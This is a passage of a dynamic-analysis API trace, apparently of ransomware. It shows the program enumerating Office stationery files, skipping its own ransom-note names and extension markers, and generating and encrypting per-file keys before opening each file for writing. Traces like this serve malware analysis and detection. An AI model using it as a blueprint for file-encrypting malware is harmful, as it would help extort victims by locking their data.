ftCreationTime.dwLowDateTime=0xc4e4cd3a, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4e4cd3a, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44835973, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x8a1, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Monet.jpg", cAlternateFileName="")) returned 1 [0245.764] lstrcmpiW (lpString1="Monet.jpg", lpString2="Windows") returned -1 [0245.764] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg") returned 71 [0245.764] StrStrIW (lpFirst="Monet.jpg", lpSrch=".horseleader") returned 0x0 [0245.764] lstrcmpW (lpString1="Monet.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.764] lstrcmpW (lpString1="Monet.jpg", lpString2="_uninstalling_.png") returned 1 [0245.764] lstrlenW (lpString=".testttjffg") returned 11 [0245.764] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg", lpSrch=".testttjffg") returned 0x0 [0245.764] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.764] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.764] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.765] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc51dedf2, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc51dedf2, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x448cdeeb, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1060, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Month_Calendar.emf", cAlternateFileName="")) returned 1 [0245.765] lstrcmpiW (lpString1="Month_Calendar.emf", lpString2="Windows") returned -1 [0245.765] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf") returned 80 [0245.765] StrStrIW (lpFirst="Month_Calendar.emf", lpSrch=".horseleader") returned 0x0 [0245.765] lstrcmpW (lpString1="Month_Calendar.emf", lpString2="#Decrypt#.txt") returned 1 [0245.765] lstrcmpW (lpString1="Month_Calendar.emf", lpString2="_uninstalling_.png") returned 1 [0245.765] lstrlenW (lpString=".testttjffg") returned 11 [0245.765] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf", lpSrch=".testttjffg") returned 0x0 [0245.765] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.765] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.765] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.765] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc522b0ac, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc522b0ac, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x448cdeeb, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x65b4, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Music.emf", cAlternateFileName="")) returned 1 [0245.765] lstrcmpiW (lpString1="Music.emf", lpString2="Windows") returned -1 [0245.766] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf") returned 71 [0245.766] StrStrIW (lpFirst="Music.emf", lpSrch=".horseleader") returned 0x0 [0245.766] lstrcmpW (lpString1="Music.emf", lpString2="#Decrypt#.txt") returned 1 [0245.766] lstrcmpW (lpString1="Music.emf", lpString2="_uninstalling_.png") returned 1 [0245.766] lstrlenW (lpString=".testttjffg") returned 11 [0245.766] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf", lpSrch=".testttjffg") returned 0x0 [0245.766] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.766] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.766] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.767] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ebf151, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ebf151, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44b2f4cb, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xb86, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Notebook.jpg", cAlternateFileName="")) returned 1 [0245.767] lstrcmpiW (lpString1="Notebook.jpg", lpString2="Windows") returned -1 [0245.767] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 74 [0245.767] StrStrIW (lpFirst="Notebook.jpg", lpSrch=".horseleader") returned 0x0 [0245.767] lstrcmpW (lpString1="Notebook.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.767] lstrcmpW (lpString1="Notebook.jpg", lpString2="_uninstalling_.png") returned 1 [0245.767] lstrlenW (lpString=".testttjffg") returned 11 [0245.768] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg", lpSrch=".testttjffg") returned 0x0 [0245.768] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.768] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.768] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.769] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce0e3b3c, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Orange Circles.htm", cAlternateFileName="")) returned 1 [0245.769] lstrcmpiW (lpString1="Orange Circles.htm", lpString2="Windows") returned -1 [0245.769] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 80 [0245.769] StrStrIW (lpFirst="Orange Circles.htm", lpSrch=".horseleader") returned 0x0 [0245.769] lstrcmpW (lpString1="Orange Circles.htm", lpString2="#Decrypt#.txt") returned 1 [0245.769] lstrcmpW (lpString1="Orange Circles.htm", lpString2="_uninstalling_.png") returned 1 [0245.769] lstrlenW (lpString=".testttjffg") returned 11 [0245.769] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm", lpSrch=".testttjffg") returned 0x0 [0245.769] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.769] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.769] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.769] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce34510c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce34510c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa4cf00d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OrangeCircles.jpg", cAlternateFileName="")) returned 1 [0245.769] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="Windows") returned -1 [0245.769] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg") returned 79 [0245.770] StrStrIW (lpFirst="OrangeCircles.jpg", lpSrch=".horseleader") returned 0x0 [0245.770] lstrcmpW (lpString1="OrangeCircles.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.770] lstrcmpW (lpString1="OrangeCircles.jpg", lpString2="_uninstalling_.png") returned 1 [0245.770] lstrlenW (lpString=".testttjffg") returned 11 [0245.770] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg", lpSrch=".testttjffg") returned 0x0 [0245.770] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.770] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.770] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce34510c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce34510c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce109c99, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Peacock.htm", cAlternateFileName="")) returned 1 [0245.770] lstrcmpiW (lpString1="Peacock.htm", lpString2="Windows") returned -1 [0245.770] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm") returned 73 [0245.770] StrStrIW (lpFirst="Peacock.htm", lpSrch=".horseleader") returned 0x0 [0245.770] lstrcmpW (lpString1="Peacock.htm", lpString2="#Decrypt#.txt") returned 1 [0245.770] lstrcmpW (lpString1="Peacock.htm", lpString2="_uninstalling_.png") returned 1 [0245.770] lstrlenW (lpString=".testttjffg") returned 11 [0245.770] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm", lpSrch=".testttjffg") returned 0x0 [0245.770] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.771] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.772] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3913c6, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3913c6, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa51b2c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Peacock.jpg", cAlternateFileName="")) returned 1 [0245.772] lstrcmpiW (lpString1="Peacock.jpg", lpString2="Windows") returned -1 [0245.772] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned 73 [0245.772] StrStrIW (lpFirst="Peacock.jpg", lpSrch=".horseleader") returned 0x0 [0245.772] lstrcmpW (lpString1="Peacock.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.772] lstrcmpW (lpString1="Peacock.jpg", lpString2="_uninstalling_.png") returned 1 [0245.772] lstrlenW (lpString=".testttjffg") returned 11 [0245.772] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg", lpSrch=".testttjffg") returned 0x0 [0245.772] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.772] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.772] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.773] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4f0b40b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4f0b40b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44b55629, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf8d, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Pine_Lumber.jpg", cAlternateFileName="")) returned 1 [0245.773] lstrcmpiW (lpString1="Pine_Lumber.jpg", lpString2="Windows") returned -1 [0245.773] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned 77 [0245.773] StrStrIW (lpFirst="Pine_Lumber.jpg", lpSrch=".horseleader") returned 0x0 [0245.773] lstrcmpW (lpString1="Pine_Lumber.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.773] lstrcmpW (lpString1="Pine_Lumber.jpg", lpString2="_uninstalling_.png") returned 1 [0245.773] lstrlenW (lpString=".testttjffg") returned 11 [0245.773] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg", lpSrch=".testttjffg") returned 0x0 [0245.773] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.773] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.774] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.774] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4f31568, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4f31568, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44bc7a43, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Pretty_Peacock.jpg", cAlternateFileName="")) returned 1 [0245.774] lstrcmpiW (lpString1="Pretty_Peacock.jpg", lpString2="Windows") returned -1 [0245.774] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 80 [0245.774] StrStrIW (lpFirst="Pretty_Peacock.jpg", lpSrch=".horseleader") returned 0x0 [0245.774] lstrcmpW (lpString1="Pretty_Peacock.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.774] lstrcmpW (lpString1="Pretty_Peacock.jpg", lpString2="_uninstalling_.png") returned 1 [0245.774] lstrlenW (lpString=".testttjffg") returned 11 [0245.774] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg", lpSrch=".testttjffg") returned 0x0 [0245.774] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.774] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.774] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.775] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4f7d822, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4f7d822, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44bc7a43, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36e1, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Psychedelic.jpg", cAlternateFileName="")) returned 1 [0245.775] lstrcmpiW (lpString1="Psychedelic.jpg", lpString2="Windows") returned -1 [0245.775] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 77 [0245.775] StrStrIW (lpFirst="Psychedelic.jpg", lpSrch=".horseleader") returned 0x0 [0245.775] lstrcmpW (lpString1="Psychedelic.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.775] lstrcmpW (lpString1="Psychedelic.jpg", lpString2="_uninstalling_.png") returned 1 [0245.775] lstrlenW (lpString=".testttjffg") returned 11 [0245.775] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg", lpSrch=".testttjffg") returned 0x0 [0245.775] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.775] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.775] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.779] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3913c6, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3913c6, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce12fdf6, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Roses.htm", cAlternateFileName="")) returned 1 [0245.779] lstrcmpiW (lpString1="Roses.htm", lpString2="Windows") returned -1 [0245.779] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 71 [0245.779] StrStrIW (lpFirst="Roses.htm", lpSrch=".horseleader") returned 0x0 [0245.779] lstrcmpW (lpString1="Roses.htm", lpString2="#Decrypt#.txt") returned 1 [0245.779] lstrcmpW (lpString1="Roses.htm", lpString2="_uninstalling_.png") returned 1 [0245.779] lstrlenW (lpString=".testttjffg") returned 11 [0245.779] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm", lpSrch=".testttjffg") returned 0x0 [0245.779] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.780] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.780] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.781] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3b7523, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3b7523, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa567585, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x780, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Roses.jpg", cAlternateFileName="")) returned 1 [0245.781] lstrcmpiW (lpString1="Roses.jpg", lpString2="Windows") returned -1 [0245.781] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned 71 [0245.781] StrStrIW (lpFirst="Roses.jpg", lpSrch=".horseleader") returned 0x0 [0245.782] lstrcmpW (lpString1="Roses.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.782] lstrcmpW (lpString1="Roses.jpg", lpString2="_uninstalling_.png") returned 1 [0245.782] lstrlenW (lpString=".testttjffg") returned 11 [0245.782] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg", lpSrch=".testttjffg") returned 0x0 [0245.782] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.782] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.782] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.783] FindNextFileW (in: hFindFile=0x7c6860, 